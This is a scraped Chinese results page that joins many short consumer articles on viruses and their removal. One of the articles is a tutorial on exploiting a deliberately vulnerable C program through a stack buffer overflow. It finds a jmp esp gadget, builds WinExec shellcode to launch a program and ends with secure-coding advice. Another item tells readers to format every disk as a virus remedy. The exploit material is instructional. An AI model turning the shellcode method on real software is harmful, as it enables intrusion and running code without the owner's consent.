为您找到与消灭病毒漏洞相关的共200个结果:
大部分病毒、木马程序都会利用系统安全漏洞(包括软件中的漏洞)进行传播、攻击电脑。为了“切断”病毒与木马程序的传播及攻击途径,管家用户必须在第一时间修复漏洞!下面由读文网小编给你做出详细的杜绝漏洞电脑病毒木马解决方法介绍!希望对你有帮助!
管家用户可在“设置中心”,进行“提醒和修复方式”选择,建议用户勾选“有高危漏洞时自动修复,无需提醒”,这样可以保障用户系统安全、稳定性。
杜绝漏洞电脑病毒木马解决方法:修复漏洞—设置中心
看了“杜绝漏洞电脑病毒木马解决方法”文章的还看了:
浏览量:2
下载量:0
时间:
电脑已经走进我们的生活,与我们的生活息息相关,感觉已经离不开电脑与网络,对于电脑病毒,今天小编在这里给大家推荐一些预防电脑病毒相关文章,欢迎大家围观参考,想了解更多,请继续关注读文网。
一、前言
大都数“病毒”都是可执行文件(EXE格式),都是传统意义上的恶意程序,它们在被用户双击运行后,就开始执行自身代码,实现相应的功能,从而对用户的计算机产生威胁。而这次我打算讨论一种特殊的情况,也就是利用正常程序所存在的漏洞,仅仅通过文本文档(TXT格式),来实现我们的对话框的启动。所以这篇文章的讨论重点就在于简单的漏洞发掘以及运用ShellCode实现漏洞的利用。在此不会讨论复杂的情况,仅仅用浅显的例子来说明这些问题,因为即便是现实中的复杂情况,其基本原理是相似的。这也是为以后的篇章中讨论更加复杂的情况打下基础。
二、编写含有漏洞的程序
在现今的软件开发中,尽管程序员的水平在提高,编程技巧在不断进步,但是大部分人对于计算机安全的概念还是比较模糊的,真正掌握计算机安全技术的人毕竟还是少数。特别是计算机安全往往还涉及到系统底层原理、汇编甚至是机器码,这就更加令人望而却步。我在这里讨论的就是一个含有漏洞的程序,它含有缓冲区溢出漏洞。缓冲区溢出攻击是一种非常有效而常见的攻击方法,在被发现的众多漏洞中,它占了大部分。
以下就是本次所研究的程序:
#include #include
#include #define PASSWORD "1234567890"
int CheckPassword(char *pPassword)
{ int nCheckFlag;
char szBuffer[30]; nCheckFlag = strcmp(pPassword, PASSWORD);
strcpy(szBuffer, pPassword); https://存在溢出漏洞 return nCheckFlag;
}
int main() {
int nFlag = 0; char szPassword[1024];
FILE *fp; LoadLibrary("user32.dll");
if(!(fp=fopen("password.txt", "rw+"))) {
return 0; }
fscanf(fp,"%s",szPassword); nFlag=CheckPassword(szPassword);
if(nFlag) {
printf("Incorrect password!"); }
else {
printf("Correct password!"); }
fclose(fp); getchar();
return 0; }
这里来讲解一下程序的运行流程。main函数中首先会打开当前目录下的password.txt文件,然后调用CheckPassword函数,该函数会对从password.txt文件读取出来的内容与字符串“1234567890”进行比较,用于验证密码是否正确,之后将用户所输入的密码拷贝到子函数自己创建的数组中,再返回到主函数,最后对用户所输入的密码是否正确进行显示。
这个程序中之所以要用TXT文件来保存用户输入的密码,就是为了方便之后的讨论与观察。而在子函数中将用户输入的密码拷贝到一个数组中,仅仅是为了创造一个缓冲区溢出的漏洞,也是为了方便之后的讨论。在现实中,可能难以出现这样的情况。但是原理是一样的,缓冲区溢出漏洞出现的原因就是因为没能检测待拷贝数据的大小,而直接将该数据复制到另一个缓冲区中,从而使得恶意程序得到了攻击的机会。
三、漏洞原理的分析
不论是对于本篇文章所讨论的最简单的缓冲区溢出的漏洞,还是复杂的,可能会在未来的文章中讨论的堆溢出以及SEH的利用,其核心可以说都是利用了指针(或者说是相应的地址)来做文章。对于这次的程序来说,首先需要从反汇编的角度简单讲一下程序的执行原理。
主函数中会调用CheckPassword函数,那么在反汇编中,就需要找到调用该函数的位置,这个很简单:
004010F3 E8 0DFFFFFF call 00401005
之所以能很快确定函数的位置,是因为它在源程序中就在fscanf函数的后面,那么反汇编中,他的位置也在fscanf的后面。这里有必要简单说一下call的实现原理。它分为两步,第一步是向栈中压入当前指令在内存中的位置,即保存返回地址(EIP所保存的地址,也就是call的下一条指令,EIP入栈);第二步是跳转到所调用函数的入口处。进入这个call,来到以下反汇编代码处:
00401020 55 push ebp 00401021 8BEC mov ebp,esp
00401023 83EC 64 sub esp,64
可以说每一个函数的开始,其反汇编结果都是这么几句。主要是三步:第一步需要保存当前栈帧状态值,以备后面恢复本栈帧时使用(EBP入栈);第二步将当前栈帧切换到新栈(将ESP值装入EBP,更新栈帧底部);第三步给新栈帧分配空间(把ESP减去所需空间的大小,抬高栈帧)。
这里需要说明的是,以上所分析的是程序的Debug版,如果是Release版,由于做了优化,可能会有些不同,但也是遵循基本原理,在这里就不再对Release版进行讨论。
现在来看看堆栈中的情况,按照内存地址递减的顺序,EBP相比EIP位于内存的低地址处,这两个寄存器在栈中是挨着的。再来看看CheckPassword函数结尾处的反汇编代码:
0040106C 8BE5 mov esp,ebp 0040106E 5D pop ebp
0040106F C3 retn
可见这里首先将esp指向了当前栈帧的栈底,之后从栈中弹出原始ebp的值,这样就实现了恢复栈帧的操作。之后的retn语句,就是再次弹出栈顶的值(EIP),并转去执行EIP所指向的语句,也就是之前的call的下一条语句。
分析至此,就可以发现,我们可以通过修改EIP所保存的值(指令地址),来实现跳转到我们自己的“病毒代码”地址处的目的。当然这里我不会利用反汇编工具进行修改,而是直接运用password.txt这个文本文档来实现。
四、定位EIP
知道了漏洞利用的原理,那么接下来就需要确定EIP的位置。EIP的位置尽管可以通过反汇编工具获得,但是在此我不想用这种简单的方法,而是运用Windows的报错对话框实现EIP的定位。当EIP被覆盖为一个无效地址后,系统就会提示出错,报错对话框就能够显示出来究竟是哪个地址(EIP)出错,这里可以通过一些小技巧来定位。
当然,每个人往往有自己认为最好的定位方法,我个人比较喜欢的方法是运用26个小写字母连同26个大写字母组成一长串数据进行测试,这样一次性就能够测试52个字节的长度。具体方法是将这52个字母写入password.txt文件,运行程序查看是否报错,如果不报错,就再写入52个字母,直至报错为止。幸运的是,在这个程序中,前52个字母就使得报错对话框弹出了:
从报错对话框中可以得知,EIP已经被覆盖为0x5251504f,通过查询ASCII码表可以得知,对应的四个字母是OPQR(小端显示,我这里反过来写了),于是可知,EIP的位置就是password.txt文档内容的第41至第44个字节处。
确定了EIP的位置,那么接下来就要确定应当给它赋以什么地址。这里当然可以利用反汇编软件在程序中寻找空余的位置,将代码写入,然后令EIP指向该代码处。但是这里我打算用更加巧妙的方法——jmp esp。我们可以将EIP指向内存中jmp esp的地址,然后将我们的程序的机器码(ShellCode)顺序从EIP处向下(地址高处)覆盖,这样jmp esp就能够直接跳到我们的代码处执行了。
首先编程序寻找jmp esp:
#include #include
#include #define DLL_NAME "user32.dll"
int main()
{ BYTE *ptr;
int position,address; HINSTANCE handle;
BOOL done_flag = FALSE; handle = LoadLibrary(DLL_NAME);
if(!handle) {
printf("load dll error!"); exit(0);
} ptr = (BYTE*)handle;
for(position = 0; !done_flag; position++)
{ try
{ if(ptr[position]==0xFF && ptr[position+1]==0xE4)
{ int address = (int)ptr + position;
printf("OPCODE found at 0x%x", address); }
} catch(...)
{ int address = (int)ptr + position;
printf("END OF 0x%x", address); done_flag = true;
} }
return 0; }
程序执行结果如下:
上述程序中是在user32.dll中寻找jmp esp的机器码FFE4,会查找到很多的结果,选择其中的一个就可以。这里需要特别说明的是,不同的计算机不同的操作系统版本,所找到的jmp esp的地址可能会不一样,就是说jmp esp的地址往往并不是通用的。当然,也会有几个地址是跨版本的,这个在这里不讨论。这次我们选择截图中的第一个地址——0x77d93ac8。由于是小端显示,所以应当在“OPQR”的位置反向书写,即c83ad977。当然这里不能够直接用类似于记事本这样的软件进行编辑,而是需要用十六进制代码编辑器操作。
五、编写ShellCode
为了简单起见,我这里将“病毒”程序与上述漏洞程序放在同一目录下,并且为了编写方便,我这里将“病毒”名称更改为Hack.exe。为了实现“病毒”的启动,我不打算直接将“病毒”程序转化为ShellCode,毕竟那样的话工作量太大,而是编写一个能够启动“病毒”程序的ShellCode。这里我使用WinExec函数用于“病毒”的启动,最后再用ExitProcess函数实现程序的正常退出。查询这两个函数句柄的代码如下:
#include #include
typedef void (*MYPROC)(LPTSTR); int main()
{ HINSTANCE LibHandle;
MYPROC ProcAdd; LibHandle = LoadLibrary("kernel32");
https://获取user32.dll的地址 printf("msvcrt LibHandle = https://x%x", LibHandle);
https://获取MessageBoxA的地址 ProcAdd=(MYPROC)GetProcAddress(LibHandle,"WinExec");
printf("system = https://x%x", ProcAdd);
return 0; }
运行结果如下:
上述程序首先需要知道被查询函数所在的动态链接库,先查出动态链接库的地址,之后利用这个地址,从而查询相应API函数的句柄。可以知道WinExec的句柄为0x7c863231,那么同理,ExitProcess函数的句柄为0x7c81bfa2。
至此,我们已经获得了足够的信息,接下来就可以进行ShellCode的编写了,但是一般来说,我们不会特意去记忆十六进制的机器码,因此都是先写出汇编程序,然后利用相应的软件通过转换,从而查看其机器码。具体的方法有很多,我还是比较倾向于在VC++6.0中以内嵌汇编语言的形式进行编写:
_asm {
xor ebx,ebx push ebx
push 0x6578652e push 0x6b636148
mov eax,esp ;压入字符Hack.exe
push ebx push eax
mov eax,0x7c863231 call eax ;调用WinExec函数
push ebx
mov eax,0x7c81bfa2 call eax ;调用ExitProcess函数
}
这里需要把asm中的内容转化为机器码,VC++6.0就可以实现(也可以使用其它反汇编软件)。利用十六进制文件编辑器,将提取出来的机器码直接填写进password.txt中EIP的后面。
这里要说明的是,尽管以上仅仅是调用了非常简单的函数,但是实际上,不管是什么函数,其调用原理和上面是一样的,都是首先需要把参数从右至左入栈,然后call该函数所在的地址。为了增强可移植性,可以利用TEB获取相关函数的句柄,从而编写出通用性极高的ShellCode出来(这些高级方法可能会在以后的文章中讨论)。由此可见,漏洞可以很容易被恶意程序所利用。
当编辑完password.txt后,运行CheckPassword.exe程序,结果如下图所示:
由此可见,仅仅是通过修改password.txt就能够在神不知鬼不觉的情况下实现病毒的启动(尽管这一过程有诸多限制)。而这里所用到的WinExec函数也多用于“下载者”中,它是一种功能单一的恶意程序,能够令受害的计算机到黑客指定的URL地址去下载更多的恶意程序并运行。“下载者”体积小,易于传播,当它下载到病毒木马后,通常就使用诸如WinExec这样的函数来运行病毒。
六、“病毒”的防范
漏洞的发掘与利用是一个较为高深的话题,在现实中,其发掘的难度是远远高于我在这里所举的例子的。高明的黑客手中往往掌握着一些不被软件生产厂家所知道的漏洞,他们利用这些软件漏洞,往往就能够为所欲为。所以,这就要求我们培养良好的安全编码习惯。在上述例子中,漏洞的出现就是因为使用了strcpy函数,更具体来说,因为我们没有对将要复制到缓冲区中的数据进行长度检验,导致了EIP被非法覆盖,跳去了不应该去的位置,执行了不该执行的代码。现实中的漏洞往往也是这个道理。所以在这种情况下,应当事先检验数据的长度,至少将strcpy替换成strncpy,尽管后者也存在危险,但至少会按照编程者要求的数据量的大小来拷贝数据,这就安全多了。当然我们系统版本的不断升级,在安全性方面也会不断进步。比如加入的Security Cookie就能够较好地对缓冲区溢出的问题进行防范。不过这也不是绝对安全的,毕竟在攻与防的对立统一中,技术是不断进步的。但是归根结底,只有在源头上做足功夫,才会让黑客们无从下手。
七、小结
本篇文章构造了一个特殊的环境——存在漏洞的程序——实现了“病毒”的自启动。由于关于漏洞的知识体系比较庞大且较为高深,我也只能用这个简单的程序来让大家看看冰山的一角。这里需要再次说明的是,现实中漏洞的原理和利用方法可以说和这个例子是差不多的。现实中可能需要我们编写出更为通用的ShellCode来实现我们想要完成的功能,这些会在以后的文章中进行讨论。本篇文章仅仅是为了打好基础,为未来更加高深的知识的探讨做好准备。
浏览量:2
下载量:0
时间:
现如今,网络越来越开放了,什么无线网、wifi、无线wifi、免费wifi数不胜数等等。大家上网特别的方便了,但是随之而来的中病毒的几率也越来越高,特别是各种的木马病毒防不胜防。那么你知道win7怎么快速删除病毒文件夹吗?下面是读文网小编整理的一些关于win7快速删除病毒文件夹的相关资料,供你参考。
一、首先,我们需要关闭系统还原。在“开始→运行“中输入”gpedit.msc”,启用组策略编辑器,依次展开“计算机配置→管理模板→系统→系统还原”,在右侧双击“关闭系统还原”,设为“启用”。
二、然后再展开“计算机配置→管理模板→Windows组件→Windows Installer”,在右边双击“关闭创建系统还原检查点”,设为“启用”,再运用“cacls”命令【cacls “c:System Volume Information” /g everyone:f】赋予当前用户完全控制权限后就可以删除“System Volume Information”文件夹了。
删除win7病毒文件夹,一般我们都需要通过一个小命令,就是上述两个大的步骤。就可以帮助我们在win7系统里,轻松地删除的顽固的病毒文件,这些病毒可是连杀毒软件都检测不出来或者是杀不了。这样你的电脑网络环境更安全,更保密!
win7快速删除病毒文件夹的相关
浏览量:2
下载量:0
时间:
这几天不少网友在使用win7更新补丁后就蓝屏了,代码为0x0000006b。发生这一蓝屏问题的都是安装了2016年四月份推出的安全更新补丁,安装后就出现蓝屏,有的网友表示没问题,有的直接蓝了。这个蓝屏重启后依旧,安全模式进不去,最后一次正确配置也无效,那么你知道win7更新漏洞后产生0x0000006B蓝屏怎么办吗?下面是读文网小编整理的一些关于win7更新漏洞后产生0x0000006B蓝屏的相关资料,供你参考。
安装了2016年四月份推出的安全更新补丁导致蓝屏是win7系统的
首先要制作一个pe系统。这个PE需要需集成dism++。这方面的系统网上很多,不再做介绍。电脑重启,选择从U盘启动或者光盘启动,进入PE系统。
如果没有这个dism++可以从网上下载,然后解压到Pe系统中就可以了。
32位系统,打开在命令提示符窗口。输入:
dism /Image:C: /Remove-Package /PackageName:Package_for_KB3146706~31bf3856ad364e35~x86~~6.1.1.2
按回车键执行。
64位系统,提示符窗口输入:
dism /Image:C: /Remove-Package /PackageName:Package_for_KB3146706~31bf3856ad364e35~amd64~~6.1.1.2
按回车键执行。
其中上面命令的C:为系统盘符,如果系统不是安装在C盘,就会C换为实际的盘符。比如系统是在D盘,那就就是dism /Image:D:
这是命令的/.符号都是英文字符,不要输入错了哦。
卸载完成后,重启电脑。
如果需要帮助别人或者是处理的电脑比较多的话,可以将这个命令改为批处理文件,这们使用时只要在PE系统中运行下这个文件就可以了,省得输入那么长的命令。
新建一个记事本,一个用于32位系统。打开记事本输入
dism /Image:C: /Remove-Package /PackageName:Package_for_KB3146706~31bf3856ad364e35~x86~~6.1.1.2
保存文件,把文件名和扩展名改为:WIN7-32位.bat
再新建一个记事本,用于64位系统的。打开记事本输入
dism /Image:C: /Remove-Package /PackageName:Package_for_KB3146706~31bf3856ad364e35~amd64~~6.1.1.2
保存文件,把文件名和扩展名改为:WIN-64位.bat
然后把这两个文件复制到U盘,使用进双击打开一次就好了。
这次引起的蓝屏主要是使用精简版或者修改版的GhostWIN7系统。使用原版安装基本都没有问题。
系统修复成功后,最好是将自动更新关掉。其他软件如果需要更新时,记得忽略这个KB3146706这个上补丁,不要安装。
注意事项
输入命令前注意对应是哪个版本的,32位对应输入32的。
win7更新漏洞后产生0x0000006B蓝屏的相关
浏览量:2
下载量:0
时间:
我们在下载了一些压缩包后,经常在解压的时候,安全软件就会提醒我们文件有木马的这些提示,那么怎么解决解压经常遇到病毒木马呢?下面读文网小编就为大家带来了解决解压经常遇到病毒木马的方法。
当我们从网上下载一些视频、音频的RAR或ZIP格式的压缩包,解包后有时会发现,其中可能会有一个或多个名字是“播放必读”或“安装必读”之类的文件,这些文件或者是扩展名为LNK的HTML网页链接文件,甚至是EXE、COM、BAT、CMD、SCR格式的可执行文件,注册表REG文件,点击之后连接到一个网站上或运行一个含有广告信息的页面,甚至会莫名其妙地一闪而过,貌似什么也没做。但之后也许你会发现系统运行明显比原来慢了,这很有可能是被误导连接到黑客或木马网站上或运行了木马程序,致使电脑中招了。
对于下载来的影音文件包,我们一般都是使用其中的声音文件或视频文件,多余的链接文件或可执行文件与我们无关,完全可以不予理会。既然如此,那么,能否在解包时就将这些无关的,但可能存在危险的文件排除在外并过滤掉呢?
我们可以通过压缩软件(如WinRAR)本身的功能来将其过滤掉,通过设置将这些危险文件排除在使用之外。
第一步:
启动WinRAR,单击“选项→设置”菜单命令(或直接按下Ctrl+S组合键),打开“设置”窗口(图1)。
第二步:
切换到“安全”标签下,勾选“解压时排除的文件类型”复选框,并在下面的文本框中追加输入“*.html *.asp *.reg”等。若有多个排除的文件类型,两两之间用半角空格分隔,例如“*.exe *.com *.pif *.scr *.bat *.cmd *.lnk *.html *.asp *.reg”等(图2)。
第三步:
以上设置完毕之后,单击“确定”。这样设置后,以后解压压缩包时,这些类型的文件就不会被释放,做到了“取其精华,去其糟粕”的目的。
如果我们要对软件压缩包进行解压,那么其中的有用信息可能正好是我们过滤掉的文件类型。这时,只需在WinRAR设置窗口的“安全”选项卡下,将“解压时排除的文件类型”复选框前的钩去掉即可。
如果使用好压软件,需要先进入“设置”窗口,点击“压缩”选项卡,点击“修改默认配置”(图3)。然后在弹出的“修改默认压缩配置”窗口中,在“要排除的文件列表”文本框中输入需要排除的文件扩展名(如*.reg *.cmd等)(图4)。
以上就是解压常遇病毒木马的解决方法介绍,操作很简单的,大家按照上面步骤进行操作即可,希望这篇文章能对大家有所帮助!
看过“怎么解决解压经常遇到病毒木马”
浏览量:6
下载量:0
时间:
U盘病毒最近有抬头的趋势,借助U盘传播病毒早已成为病毒传播的主要方式,因此要预防病毒,首先要从U盘做起,打造铜墙铁壁般的U盘,使病毒无机可施,那么你知道win7怎么预防U盘病毒吗?下面是读文网小编整理的一些关于win7预防U盘病毒的相关资料,供你参考。
禁止注册表中MountPoints2的写入。依次点击"开始"→"运行",输入regedit后回车,打开注册表编辑器,依次展开“HKEY_CURRENT_USER Software Microsoft Windows CurrentVersionExplorerMountPoints2,右键点击MountPoints2键,选择权限,将Administrators组和SYSTEM组的完全控制项都设为拒绝。
说明:禁止MountPoints2的写入是为了阻止Windows读取Autorun.inf后添加新的右键菜单项,从而阻止病毒菜单项的出现,使之无法激活病毒。
用资源管理器打开U盘内容。具体操作方法:按下键盘组合键“Win+ E”打开资源管理器,然后选择U盘盘符并打开,即可防止U盘中的Autorun.inf文件的运行,从而有效防止病毒文件的运行。
安装电脑管家-U盘防火墙。下载并安装360安全卫士,然后进行设置:运行360安全卫士,依次点击“工具大全”-“360保镖”,在弹出的窗口中选择“U盘保镖”,开启U盘安全扫描即可。下次当插入U盘时,任务栏上会弹出扫描U盘状态窗口,执行扫描U盘的操作。
win7预防U盘病毒的相关
浏览量:4
下载量:0
时间:
网上介绍清理病毒的方法有很多种,但是都比较复杂,而且有些顽固病毒不是那么好清除,那么你知道win7系统怎么进入PE清除电脑病毒吗?下面是读文网小编整理的一些关于win7系统进入PE清除电脑病毒的相关资料,供你参考。
事先做好U盘启动盘(在此运用的是口袋PE)
1、把U盘插进win7系统计算机上;
2、开启电脑时按准win7键盘中的F8键(或Delete键)登进BIOS设置面板(不一样的主板登进BIOS设置面板的按键就不相同);
3、登进BIOS面板后,以键盘中的←→键切入BOOT页面,并在其中寻到USB字样的项目,把它设定成第一启动项,按键盘上F4储存,详细看BIOS面板中指示;
4、重启win7系统后登进”口袋PE功能选择“菜单栏,点选“启动口袋U盘Win2003PE维护系统”后点击确定;
5、双击“我的电脑”开启,再依次右击须格式化的磁盘,点选“格式化”键值;
6、咋合适系统就会出现“格式化”提示框,点选“开始”继续;
7、一切须格式化的磁盘都进行格化以后,重新启动win7电脑,再重装系统便可以了;
PS:在进行此操作之前,一定要事先把需要用的的资料备份,不然就一切都没有了。
win7系统进入PE清除电脑病毒的相关
浏览量:22
下载量:0
时间:
win10每次开机都会在电脑右下角弹出“启用病毒防护”或者是“启用Windows防火墙”等类似的提示。那么win10怎么关闭启用病毒防护提示呢?读文网小编分享了win10关闭启用病毒防护提示的方法,希望对大家有所帮助。
关闭Win10启用病毒防护提示主要有2种方法,一种是启用Windos defender,这样下次就不会提示了,比较适合电脑中没有安装其它一些安全软件的用户。另外一种是,关闭启用病毒防护提示,不让它弹出提示消息,适合不喜欢Win10自带的病毒防火功能,或者电脑中已经安装了安全软件的用户。针对这2种情况,我们分别介绍下。
一、启用Win10病毒防护功能
1、点击Win10右下角任务栏的“新通知”图标,在弹出的通知列表中,点击“启用病毒防护”,如下图。
2、在打开的安全与维护操作界面,点击安全,然后将“Windows Defender”病毒防护功能“开启”就可以了,如图。
启用Win10病毒防火功能之后,今后就不会有提示了。
二、隐藏Win10启用病毒防护提示方法
1、点击Win10开始菜单,然后点击进入“设置”,如下图所示。
2、然后点击进入“系统”设置,如图。
3、在系统设置界面,点击左侧的“通知和操作”选项,然后在右侧的通知下面,将“显示有关Windows提示”关闭就可以了,如图。
关闭显示有关Windows提示通知后,今后就不会看到启动病毒防护提示了。
看过“win10怎么关闭启用病毒防护提示”
浏览量:3
下载量:0
时间:
木马病毒利用受感染的电脑主动感染其他连接的电脑,症状可能是档案损毁,当机,慢机,应用程式无法执行等等,那么你知道如何清除木马病毒感染吗?下面是读文网小编整理的一些关于清除木马病毒感染的相关资料,供你参考。
清除木马可以很简单亦可以非常专业。难度是有些木马会骑劫浏览器令你无法更新清除木马病毒程式的数据库,变相废掉你的防毒程式和防木马程式。
1.下载并安装 Malwarebytes 反恶意软件。
2.选择执行快速扫描,然后点击扫描按钮,开始搜索恶意文件。
3.完成时,您将看到一个屏幕,显示 Malwarebytes 检测到的感染。确保一切感染都被选中(打勾),然后点击删除所选按钮,或者乾脆选择 (Quarantee All)。
如果您在互联网搜索什麽是 spigot,你会发现 spigot 是一个广告软件在浏览过程中自动弹出的广告。另一个好删除木马程式是 Hitman Pro.
4.一般清除木马病毒为了保险会用多个免费扫描程式。除了 Malwarebtyes 外,我亦会用 Kaspersky 线上版。防毒软件供应商多少有点靠吓来造生意。说你电脑有问题不一定是真有问题,很多是设定需要。所以你主要关心 Malware 这部份。
5.亦会用 adwcleaner 清除广告木马病毒。广告木马病毒 (比如 find22) 的造法是在你浏览时骑劫,先访问它的广告伺服器调出广告内容,变相将浏览器拖慢。
6.曾经遇过非常凶狼的木马,令 Chrome 和 Firefox 都不能上网,只能用 IE上网。用 IE 上网时自动跳到一大堆广告网站。清除木马亦失败原因是不让你更生木马数据库。最后知道对方是改动了 Windows 连线的架构,要以指令 “netsh winsock reset" 还原 Network Adapter 正常架构,然后更新木马数据库才能清除该广告木马。
清除木马病毒感染的相关
浏览量:2
下载量:0
时间:
计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。下面是读文网小编带来内存卡有病毒怎么清理的内容,欢迎阅读!
1,如果遇到了电脑中难以查杀的病毒,一般是存在守护进程,这个进程就是占用病毒文件,然后让杀毒软件无法对正在运行中的程序进行删除,首先我们需要打开任务管理器,也就是同时按下键盘上的CTRL+DEL+ALT,3个键
2,按下这3个键后,如果是WIN7、WIN8会弹出一个窗口,让你选择关机、任务管理器等操作,从中选择【任务管理器】
3,打开任务管理器后,下一步就比较简单了,打开进程分类,然后在里面找到占CPU比较大或者说占内存大,重复名称的进程,就很有可能是病毒,点下面的结束进程就可以了。
看了“内存卡有病毒怎么清理”的内容的人还看:
浏览量:11
下载量:0
时间:
由于集成有能保护用户不会受到互联网恶意件攻击的功能强大的反病毒工具,Windows 10号称是微软有史以来最安全的操作系统,那么你知道win10设备怎么防病毒吗?下面是读文网小编整理的一些关于win10设备防病毒的相关资料,供你参考。
如果用户想对Windows Defender扫描有更大控制权,可以选择“自定义”选项,然后点击“立即扫描”按钮,系统会弹出一个窗口,其中包含用户可以选择扫描的硬盘列表。
如果用户想对列表中的一个硬盘进行扫描,可以点选该硬盘(所有子文件夹也将被选中)。用户也可以点击“+”符号,查看每个硬盘上的文件夹,进一步选择希望扫描的文件夹。
浏览量:2
下载量:0
时间:
很多时候大家已经用各类安全软件、杀毒软件查出了自己的机子中了例如:Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就蒙了,那么你知道网络病毒是怎么命名吗?下面是读文网小编整理的一些关于网络病毒是命名的相关资料,供你参考。
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般共有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的共有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒
木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的共有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。
4、脚本病毒
脚本病毒的前缀是:Script。脚本病毒的共有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,以此类推。该类病毒的共有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。
6、后门病毒
后门病毒的前缀是:Backdoor。该类病毒的共有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。
7、病毒种植程序病毒
这类病毒的共有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的共有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的共有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
10.捆绑机病毒
捆绑机病毒的前缀是:Binder。这类病毒的共有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。
以上为比较常见的病毒前缀,有时候我们还会看到一些其他的,但比较少见,这里简单提一下:
DoS:会针对某台主机或者服务器进行攻击;
Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具;
HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。
你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助。
网络病毒的相关
浏览量:2
下载量:0
时间:
十年前的电脑病毒基本上是损人不利己。病毒利用受感染的电脑主动感染其他连接的电脑,症状可能是档案损毁,当机,慢机,应用程式无法执行等等,那么你知道怎么清除木马病毒感染吗?下面是读文网小编整理的一些关于清除木马病毒感染的相关资料,供你参考。
清除木马可以很简单亦可以非常专业。难度是有些木马会骑劫浏览器令你无法更新清除木马病毒程式的数据库,变相废掉你的防毒程式和防木马程式。
1.下载并安装 Malwarebytes 反恶意软件。
2.选择执行快速扫描,然后点击扫描按钮,开始搜索恶意文件。
3.完成时,您将看到一个屏幕,显示 Malwarebytes 检测到的感染。确保一切感染都被选中(打勾),然后点击删除所选按钮,或者乾脆选择 (Quarantee All)。
如果您在互联网搜索什麽是 spigot,你会发现 spigot 是一个广告软件在浏览过程中自动弹出的广告。另一个好删除木马程式是 Hitman Pro.
4.一般清除木马病毒为了保险会用多个免费扫描程式。除了 Malwarebtyes 外,我亦会用 Kaspersky 线上版。防毒软件供应商多少有点靠吓来造生意。说你电脑有问题不一定是真有问题,很多是设定需要。所以你主要关心 Malware 这部份。
5.亦会用 adwcleaner 清除广告木马病毒。广告木马病毒 (比如 find22) 的造法是在你浏览时骑劫,先访问它的广告伺服器调出广告内容,变相将浏览器拖慢。
6.曾经遇过非常凶狼的木马,令 Chrome 和 Firefox 都不能上网,只能用 IE上网。用 IE 上网时自动跳到一大堆广告网站。清除木马亦失败原因是不让你更生木马数据库。最后知道对方是改动了 Windows 连线的架构,要以指令 “netsh winsock reset" 还原 Network Adapter 正常架构,然后更新木马数据库才能清除该广告木马。
清除木马病毒感染的相关
浏览量:2
下载量:0
时间:
计算机中了病毒有什么症状呢?通常情况下,当计算中病毒后,在电脑操作者看来并无明显的特征,但是我们仍然可以通过一些细节问题来判断电脑是否已中病毒,那么你知道电脑中病毒的症状是什么吗?下面是读文网小编整理的一些关于电脑中病毒的症状的相关资料,供你参考。
